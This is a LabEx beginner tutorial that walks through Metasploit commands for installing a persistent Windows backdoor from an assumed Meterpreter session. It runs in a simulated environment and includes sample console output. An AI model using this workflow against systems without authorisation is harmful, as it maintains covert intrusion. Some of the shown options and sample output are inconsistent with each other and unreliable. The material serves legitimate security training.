LabEx
Log InJoin Free

Establish Persistence with a Metasploit Module

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn the fundamental process of establishing persistence on a target system using the Metasploit Framework. Persistence is a critical phase in penetration testing, allowing an attacker to maintain access to a compromised system even after it reboots or the initial connection is lost. We will explore how to use a specific Metasploit module to create a backdoor that automatically reconnects to your machine. This lab focuses on the commands and concepts in a controlled, simulated environment.

Gain a privileged Meterpreter session on a target

In this step, we will start the Metasploit Framework and understand the context for our task. In a real penetration test, establishing persistence is a post-exploitation activity. This means you would have already gained initial access to the target system, typically in the form of a Meterpreter session.

For this lab, we will focus on the commands and procedures for setting up persistence. We will assume that you have already successfully compromised a target and have a Meterpreter session running in the background.

First, let's launch the Metasploit console from the terminal. The -q flag provides a quiet start, suppressing the startup banner.

msfconsole -q

Your command prompt should now change to msf6 >, indicating that you are inside the Metasploit Framework.

In a real scenario with an active session, you could list it with the sessions command. To interact with it, you would use sessions -i <session_id>. To return to the msf6 > prompt to use post-exploitation modules, you would use the background command from within the Meterpreter session. We will proceed as if we have already backgrounded our session.

Search for persistence post-exploitation modules

In this step, we will search for modules within Metasploit that can help us establish persistence. Metasploit has a powerful search function that allows you to find modules based on keywords, type, platform, and more.

We are looking for a module related to "persistence". Let's use the search command inside the Metasploit console to find relevant modules.

search persistence

This command will return a list of exploits, auxiliary, and post-exploitation modules that match the keyword. The output shows the module's name, disclosure date, rank, and a brief description.

Your output will look similar to this (some details may vary):

Matching Modules
================

   ##   Name                                           Disclosure Date  Rank       Check  Description
   -   ----                                           ---------------  ----       -----  -----------
   0   auxiliary/admin/http/dlink_dir_600_http_login    2013-02-01       normal     No     D-Link DIR-600 'dlink_user' Persistence
   1   exploit/linux/local/cron_persistence             2020-01-28       excellent  Yes    Cron Persistence
   2   exploit/osx/local/persistence                    2015-05-11       excellent  Yes    OS X Persistent Launchd Job
   3   exploit/windows/local/persistence                2012-08-20       excellent  No     Windows Persistent Service Installer
   4   exploit/windows/local/persistence_service        2014-09-11       excellent  Yes    Persistent Service Installer
   5   post/android/manage/remove_persistence           2018-09-20       normal     No     Remove persistence from device
   6   post/android/manage/set_persistence              2018-09-20       normal     No     Set persistence on device
   7   post/multi/manage/shell_to_meterpreter                          normal     No     Shell to Meterpreter Upgrade
   8   post/osx/manage/persistence                      2018-09-20       normal     No     Install persistence on OSX
   9   post/windows/manage/persistence_exe              2013-03-06       normal     No     Windows Manage Persistent EXE Payload
   10  post/windows/manage/ssh_inject                   2012-11-20       normal     No     Windows Manage SSH User Key Injection

As you can see, there are several options. For this lab, we will focus on exploit/windows/local/persistence, a reliable and commonly used module for creating a persistent service on Windows systems.

Use the exploit/windows/local/persistence module

In this step, you will select the persistence module we identified previously. The use command in Metasploit loads a specific module into the current context, allowing you to configure and run it.

To select the module, you can either type its full path or use its number from the search results (e.g., use 3). Using the full path is generally more reliable as the numbers can change.

Let's load the exploit/windows/local/persistence module.

use exploit/windows/local/persistence

After running this command, your prompt will change to reflect the currently loaded module: msf6 exploit(windows/local/persistence) >.

Now that the module is loaded, we can view its options to see what needs to be configured. Use the show options command.

show options

This will display a table of all the parameters you can set for this module, their current values, and whether they are required.

Module options (exploit/windows/local/persistence):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DELAY    10               yes       Delay in seconds for persistent payload to connect back
   LHOST                     no        The local listener IP address
   LPORT    4444             no        The local listener port
   REX_PORT 0                no        The port to connect to on the remote host
   SESSION                   yes       The session to run this module on
   STARTUP  USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)
   ...

Notice that SESSION is a required option. This is where you would specify the ID of your compromised Meterpreter session.

Configure options for automatic startup and payload

In this step, we will configure the necessary options for our persistence module. Based on the output of show options, we need to set several parameters to define how the persistence mechanism will behave. The set command is used to assign values to these options.

First, let's specify the session. In a real scenario, you would use the ID of your active session (e.g., set SESSION 1). For this lab, we will set it to 1 as a placeholder.

set SESSION 1

Next, we need to configure the payload that the persistence mechanism will execute. This payload will call back to our machine. We must set LHOST (our IP address) and LPORT (the port we will listen on). Let's set LHOST to the local loopback address 127.0.0.1 and LPORT to 4445 (to avoid conflicts with other potential handlers).

set LHOST 127.0.0.1
set LPORT 4445

The STARTUP option determines how the payload starts on the target machine. The options are USER (runs when the user logs in), SYSTEM (runs when the system boots), or SERVICE (runs as a system service). Let's choose SERVICE for higher privileges and stealth.

set STARTUP SERVICE

You can run show options again to verify that all your settings have been applied correctly. All the values you just set should now be reflected in the "Current Setting" column.

Execute the module and verify the persistence mechanism

In this final step, we will execute the module. With all options configured, running the module will attempt to install the persistence script on the target system via the specified session. To execute the module, simply use the run or exploit command.

run

Expected Outcome: In our simulated environment, this command will fail because there is no active session with ID 1. You will see an error message similar to this:

[-] Exploit failed: Rex::Post::Meterpreter::RequestError The session is not valid.

This is the expected behavior for this lab, as we are not working with a live, compromised host.

In a real scenario with a valid session, the output would be very different. It would show the module uploading a script, modifying the registry, and confirming that the persistence mechanism was successfully installed. A successful execution might look like this:

[*] Running module against TARGET-PC
[*] Installing persistence script...
[+] Persistence script uploaded to C:\Users\Admin\AppData\Local\Temp\abcde.vbs
[*] Creating startup registry key...
[+] Persistence registry key created at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\fGhiJkL
[*] Starting the payload handler...
[+] Persistence established. The service will start on next boot.

To complete the process in a real test, you would set up a new handler (use exploit/multi/handler) configured with the same LHOST and LPORT (127.0.0.1 and 4445). After the target machine reboots, the persistent payload would execute and connect back to your handler, giving you a new Meterpreter session.

Summary

In this lab, you learned the fundamental process of establishing persistence on a target system using the Metasploit Framework. You practiced searching for relevant modules, selecting and configuring the exploit/windows/local/persistence module, and understanding how it functions.

While we simulated the environment without a live target, you have learned the exact commands and workflow required to create a persistent backdoor in a real-world penetration test. This skill is crucial for maintaining long-term access during security assessments.

Congratulations on completing the lab!

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux